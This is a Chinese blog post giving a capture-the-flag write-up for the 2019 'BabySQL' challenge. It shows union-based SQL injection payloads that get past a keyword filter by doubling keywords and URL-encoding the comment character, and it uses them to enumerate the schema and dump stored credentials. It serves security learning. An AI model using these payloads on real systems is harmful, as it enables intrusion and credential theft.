首页 > 数据库 >[极客大挑战 2019]BabySQL

[极客大挑战 2019]BabySQL

时间:2024-09-13 13:02:41浏览次数:12  
标签:username 极客 23 admin BabySQL aandnd 123 2019 password

启动靶机熟悉的界面

测试发现or被过滤且输入#号无法起到注释作用

猜测本靶机考点过滤查询关键词语句or,union,select,and,by和注释符#

测试后查询关键词发现过滤只是单次过滤 可以使用aandnd,oorr,uunionnion等绕过过滤

而#则可以用urlencode编码格式变成%23绕过,接下来我们进行常规构造语句绕过

报错说明有3个字段
?username=admin' aandnd 1=2 oorrder bbyy 4 %23&password=123

测得回显点位2,3 ?username=admin' aandnd 1=2 uunionnion sselectelect 1,2,3 %23&password=123

获得数据库名geek,版本10.3.18-MariaDB ?username=admin' aandnd 1=2 uunionnion sselectelect 1,database(),version() %23&password=123

获得表名b4bsql,geekuser

?username=admin' aandnd 1=2 uunionnion sselectelect 1, 2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema ='geek' %23&password=123


获得列名 id username password
?username=admin' aandnd 1=2 uunionnion sselectelect 1, 2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_name='geekuser' %23&password=123

查找flag

?username=admin' aandnd 1=2 uunionnion sselectelect 1, group_concat(username),group_concat(passwoorrd) ffromrom b4bsql%23&password=123

查看源码获得flag flag{bdc135ab-5320-46d6-b4f2-5d1231ead3a1}

标签:username,极客,23,admin,BabySQL,aandnd,123,2019,password
From: https://www.cnblogs.com/m1saka1/p/18411910

相关文章

  • [极客大挑战 2019]LoveSQL 1
    启动靶机作者不建议使用sqlmap我们这里就进行手工注入用万能口令登录admin'or1=1#,详情见上文(https://www.cnblogs.com/m1saka1/p/18411197)登录成功获得用户名和密码,发现密码并没有卵用,只能换思路利用账号密码的回显页面进行sql注入爆破数据库由于网站自动转义,为了方......
  • VS2019远程调试非公网非局域网的远程,经验nice-(下)
    1.远程目标主机上配置VS2019远程调试工具将VS2019远程调试工具拷贝到远程目标主机上。VS2019远程调试工具:(1)从微软官网下载: VisualStudio2022远程工具,问题是,目前只支持VS2022版本的远程工具。对于VS2019的远程工具,则不提供支持。方式(2)从VS2019安装的文件......
  • [极客大挑战 2019]EasySQL 1
    启动靶机,查看源码发现注入点只有登录框首先测试查询是用单引号闭合还是双引号闭合,如图显示查询没有报错,说明不是双引号闭合,接下来测试单引号查询语句报错说明数值代入数据库查询是由单引号闭合,尝试构建万能语句绕过验证admin'or1=1#获取flagflag{9d3c2f2d-a1......
  • [GXYCTF2019]禁止套娃
    这题用御剑扫描不出来什么结果,最后看大佬的wp发现这题使用githack扫出来的首先来收一下git源码泄露的原因:开发人员在开发的时候,常常会先把源码提交到远程托管网站(如github),最后在从远程托管网站把源码pull到服务器的web目录下,如果忘记把.git文件删除,就会造成此漏洞。利用.git......
  • [极客大挑战 2019]PHP
    1、页面提示有备份文件,使用kali中命令dirsearch扫描2、我的字典不够,扫不出,看了别人的扫出来是www.zip3、访问www.zip之后会下载压缩包,里面有三个php文件4、class.php<?phpinclude'flag.php';error_reporting(0);className{private$username='nonono';......
  • [COCI2019-2020#5] Zapina
    [COCI2019-2020#5]Zapina题意有\(n\)个不同的人和\(n\)道不同的题。第\(i\)个人开心当且仅当他被分配到\(i\)道题。求让至少一个人开心的分配方案数。、思路1定义\(dp_{i,j}\)表示前\(i\)个人发\(j\)道题,没人开心的方案数。答案等于\(n^n-dp_{n,n}\)。\[d......
  • Windows Server 2019上离线安装.NET Framework 3.5
    1、打开服务器管理器首先,下载sxs文件。然后打开服务器管理器,点击左侧的“仪表盘”,如下图所示。https://chaonb.lanzouw.com/ifOU01rvm7gf密码:666 2、添加角色和功能点击上图中的“添加角色和功能”,弹出下图所示“添加角色和功能向导”。3、选择安装功能一直点击“下......
  • qt5.15.2+opencv4.10+VS2019_64 均值滤波,高斯滤波算法详细分析
    目录 一.加载图像二.灰度图像三.均值滤波1.均值滤波均值滤波算法(MeanFiltering):    参数含义:    一句话总结:均值滤波特点:应用场景:缺点:2.高斯滤波高斯滤波算法(GaussianBlur):        高斯滤波计算过程:    参数含义:    ......
  • Visual Studio 2019 安装 DevExpress21.2 问题记录
    如题,VisualStudio2019Enterprise安装 DevExpress21.2。安装完DevExpress21.2后,使用 DevExpress_Universal_Patch_v2.4.8工具激活,手动选择了VisualStudio的路径,但是还是提示找不到路径。因此这种方式行不通... 于是乎,在网上找到了解决方案。找到 DevExpres......
  • 【Ynoi 2019 模拟赛】Yuno loves sqrt technology III
    LuoguP5048YunolovessqrttechnologyIII题意给定一个长度为\(n\)的序列\(a\)。有\(m\)次询问:查询区间\([l,r]\)中众数的出现次数。强制在线。数据范围与约定\(1\len,m,a_i\le5*10^5\)。题解十年前《蒲公英》的做法,这道题只能拿\(80\)分,因为这道题卡了空......